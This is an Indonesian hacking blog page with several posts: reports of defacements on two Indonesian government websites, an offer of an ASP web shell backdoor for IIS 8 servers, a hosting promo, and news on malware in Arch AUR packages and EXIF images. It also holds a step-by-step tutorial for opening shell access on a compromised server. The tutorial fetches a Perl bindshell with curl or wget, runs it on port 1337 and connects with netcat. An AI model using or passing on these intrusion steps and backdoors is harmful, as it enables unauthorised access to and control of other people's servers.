Latest Post


Baru baru ini Subdomain dari Situs Komisi Pemberantasan Korupsi alias KPK lebih tepatnya pada Subdomain e-LHKPN KPK Diretas , Peretas tidak merusak tampilan halaman depan namun merusak index dari direktori penyimpanan gambar yaitu pada bagian /images yang beralamat pada : https://elhkpn.kpk.go.id/images/ , Saat dikunjungi Tampilan berubah menjadi Latar putih dan berisikan Sebuah Kata-kata dan sebuah gambar Kartun dimana tulisan tersebut bertuliskan :

"Hacked by MrMoonz" 
[ Indonesian Hacker Rulez ] 

Laughing at your security! Security is just an illusion! 

Copyrights © Rabbit Security Team 2018

Entah apa motif dari kasus peretasan ini Belum jelas apakah administrator website yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
https://defacer.id/archive/mirror/2586126

atau bisa langsung melihat di alamat :

https://elhkpn.kpk.go.id/images/


(Zaenal Arifin)



Dan Terjadi lagi Website resmi Pasukan Pengamanan Presiden alias Paspampres tampaknya sedang diusili hacker. ketika pihak kami membuka sebuah file yang bernama owned.html tampak tampilan Hitam dengan Logo Devilz Street dan bertuliskan "Owned by Typical Idiot Security"

Belum jelas apakah administrator website Paspampres yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Belum diketahui pula siapakah hacker di balik serangan model deface ini. Domain mil.id sendiri sengaja dibuat PANDI (Pengelola Nama Domain Internet Indonesia) untuk kebutuhan militer.

Kejadian ini pernah terjadi pada Sabtu, 02 Mei 2015 dan kali ini pada tanggal 21 Agustus 2018 Website Resmi Paspampres kembali menjadi target para hacker.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :

http://www.zone-h.org/mirror/id/31589934

atau bisa langsung melihat di alamat :

https://www.paspampres.mil.id/owned.html


(Zaenal Arifin)



Oke Kali ini Kita Update kembali , kali ini saya akan share ASP Shell Backdoor Shell ini beda dengan shell biasanya karena shell ini khusus hanya untuk Windows Server 2012  tepatnya pada Server IIS-8. Terkadang kita menemukan sebuah website dan ketika kita upload sebuah file ketika upload sukses namun ketika dilihat 404 Not Found dan tampilan nya merupakan 404 Not Found dari Server IIS-8 , yaps karena website yang menggunakan server IIS tidak bisa mengupload ext file sembarangan , jarang yang meng enablekan untuk ext php karena rentan dari attack , maka dari itu shell ini diperlukan karena shell ini di design khusus untuk Windows Server.

Apa sih bedanya Shell ASP sama PHP ? yok sedikit bahasan biar ga kaku :v

ASP merupakan kependekan dari Active Server Pages, suatu jenis program yang bekerja dalam Microsoft (Windows) melalui IIS (Internet Information Server). ASP memerlukan server Microsoft untuk menjalankan website. Sedangkan program PHP atau Hypertext Preprocessor berjalan di server Linux atau Unix. PHP yang lebih baru bisa berjalan di server NT.


Program PHP juga bisa berjalan di Windows, Solaris, Unix dan Linux sedangkan ASP hanya bisa berjalan di server dengan platform Windows. Baru-baru ini saja, ASP bisa berjalan pada platform Linux yang hanya ada bila sudah terinstall ASP-Apache di servernya.

PHP sangatlah fleksibel ketika dikoneksikan dengan database. PHP bisa terkoneksi dengan beberapa database dimana yang sebagian besar digunakan adalah MySQL. Harap dicatat bahwa MySQL tidak akan membebani Anda sesen rupiah pun. Tapi bila Anda ingin memakai ASP, Anda perlu untuk membeli MS-SQL, produknya Microsoft.

Kecepatan me-load adalah faktor besar dalam memelihara website. Jika Anda sangat selektif soal kecepatan, Anda mungkin lebih membutuhkan PHP. Pada dasarnya kode PHP berjalan lebih cepat daripada ASP karena berjalan di space-nya sendiri sedangkan ASP menggunakan sebuah tambahan server dan menggunakan arsitektur berbasis COM.

Dalam bekerja dengan PHP, kebanyakan tools terasosiasi dengan program yang kebanyakan berupa open source software, jadi Anda tidak perlu membayar untuk mendapatkan tool tersebut. Tidak seperti ASP yang mungkin mengharuskan kita untuk membeli tool tambahan untuk bekerja dengan program ini.

Kesimpulannya, baik PHP dan ASP mempunyai keuntungan dan kerugian. Pada dasarnya semua bergantung pada bagian pengembangan website mana yang akan Anda pilih. Apakah Anda mencemaskan biaya dari pembuatan website Anda? Apakah anda ingin menggunakan bahasa pemrograman yang familiar dengan Anda? Apakah Anda menginginkan website yang lebih stabil dan cepat? Pemilihan antara ASP dan PHP pada dasarnya tergantung pada preferensi Anda sendiri. Sebaiknya Anda berunding dengan programer atau webmaster lainnya dan cari sebanyak mungkin informasi mengenai kode pemrograman mana yang paling pas dengan website Anda.
mungkin cukup sekian lah asupan tentang asp nya :v

oke langsung saja berikut merupakan tampilan dari shell nya :




Source : 
https://pastebin.com/iuJhCm8Y

Semoga Bermanfaat

(Zaenal Arifin)


Oke Kembali lagi bersama saya , Kali ini saya akan memberi kabar gembira bagi para gretongers alias pecinta Gratisan yaps kali ini mengenai Hosting webserver :V

Kali ini Rumahweb menyediakan Hosting WordPress Secara Gratis berikut spesifikasinya :

  • menggabungkan performa Litespeed Webserver yang tak terbantahkan dengan kemudahan pengelolaan WordPress dari Plesk Panel.
  • LiteSpeed WebServer untuk akses website secepat kilat
  • WordPress Toolkit untuk kemudahan mengelola WordPress
  • Plesk Panel yang kaya fitur
  • Unlimited Traffic
  • Free SSL
  • Cloud Based Infrastructure yang reliable
Wow cukup menggiurkan bukan untuk para gretongers , yok buruan jangan sampai telat karena promo ini berbatas waktu.

Kalian bisa Registrasi disini , so tunggu apa lagi ?

Semoga bermanfaat bagi para gretongers ;) selamat beraktifitas kembali
Terimakasih telah berkunjung di website kami pantau terus situs kami untuk update hal-hal menakjubkan lainnya :p

(Zaenal Arifin)

Okay this time I will give a simple tutorial on how to backconnect using bindshell . many problems that are often encountered when going to rooting the server are in step 1, namely backconnect, there may be many ways to do backconnect but this time I will give a tutorial by using bindshell


Material :
Bindshell script  : Here
Shell backdoor / webconsole shell : Here
netcat [if user windows] : Here 

Proof of Concept :
Step 1 :
Upload BindShell file, if web server not acceptable to upload shell using browser uploader u can try using command

Command Upload : 
Using Curl : curl -o bind.pl [scriptlink]
Using Wget : wget [scriptlink] -o bind.pl

Step 2 :
if u done upload the file go to cmd/Terminal [Netcat Folder]

Using Command :
Windows User : cd C:/[PathNetcat]/
Linux User : Direct order

Step 3 :
Command nc -vv [ServerIP] [Port]
if done not enter first
and go to shell backdoor/webconsole

Step 4 :
in web console u can command
Perl bind.pl 1337
and Press Enter

Notes : bind.pl => Name file bindshell , 1337 => Port

Step 5 :
Go back in cmd/Terminal
and Press Enter

and see what happens
Backconnect Success :p

PoC Video :



Notes : This trick does not run 100% on all servers and the important thing that must be considered is PERL, whether the web server is ON or OFF

(Zaenal Arifin)


Repositori perangkat lunak Linux Arch bernama Arch User Repository (AUR) telah terinfeksi oleh malware. Sebanyak tiga paket Linux Arch yang tersedia di repositori telah dilaporkan mengandung malware.

Repositori memiliki paket yang dikirim oleh pengguna, dan begitulah cara malware itu dirilis di repositori. Seorang pengguna bernama "xeactor" mengambil alih paket ‘orphaned’ dengan nama "acroread" yang berfungsi sebagai penampil PDF dan menambahkan kode jahat.

Seperti yang dilakukan Git, "Xeactor" menambahkan kode yang akan mengunduh skrip yang nantinya akan menginstal perangkat lunak yang ikut campur dengan "sistemd" dan mengkonfigurasikannya kembali. Skrip ini akan berjalan setiap 360 detik.

Malware yang dimaksudkan untuk mengumpulkan data dari sistem yang terinfeksi termasuk tanggal, waktu, ID mesin, rincian paket pengelola, informasi CPU dan output dari perintah "uname-a" dan "systemctl list-units". Data yang dikumpulkan akan diposting dalam file Pastebin baru.

Dua paket lain juga terinfeksi dengan cara yang sama. Meskipun tidak menimbulkan ancaman serius terhadap komputer yang terinfeksi, diperkirakan bahwa "xeactor" dapat meluncurkan malware lain karena mekanisme pembaruan diri tidak disertakan.

Setelah menemukan malware, perubahan yang dilakukan dalam paket itu dibatalkan, dan tim AUR telah menangguhkan "xeactor."

Namun, serangan malware ini menimbulkan kekhawatiran serius atas kredibilitas repositori paket yang dikirim pengguna. Awal tahun ini, Tim Toko Ubuntu juga menemukan penambang cryptocurrency yang tersembunyi dalam paket Ubuntu.


Di masa lalu, para peneliti keamanan telah menemukan kasus di mana hacker yang terkenal mampu menggunakan data gambar EXIF ​​untuk menyembunyikan kode berbahaya. Teknik ini masih banyak digunakan untuk menginfeksi pengguna web dengan malware.

Selangkah lebih maju, telah ditemukan bahwa peretas telah menemukan cara untuk berbagi malware melalui server Google tepercaya dan tepercaya seperti milik googleusercontent. Bertentangan dengan malware yang disimpan dalam file teks, jauh lebih sulit untuk melihat muatan berbahaya dalam gambar. Selain itu, semakin sulit melaporkan malware yang ditemukan di googleusercontent.com ke Google.

Bagi mereka yang tidak tahu, googleusercontent adalah domain Google untuk melayani konten yang disediakan pengguna tanpa memengaruhi keamanan laman Google sendiri.

Sesuai laporan Sucuri, kode berikut terlihat dalam skrip yang mengekstrak kode keamanan PayPal:



Skrip membaca data EXIF ​​dari gambar googleusercontent, yang mungkin diunggah oleh seseorang di akun Google+ atau Blogger. Ketika bagian UserComment dari data EXIF-nya didekodekan, ternyata itu adalah skrip yang memiliki kemampuan untuk mengunggah file web shell dan arbitrary.

Ini menggaris bawahi ancaman yang lebih besar karena tidak ada cara untuk mendeteksi malware sampai seseorang memeriksa meta data gambar dan menguraikannya. Bahkan setelah menemukan malware, seseorang tidak dapat mengetahui sumber sebenarnya dari gambar tersebut.

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget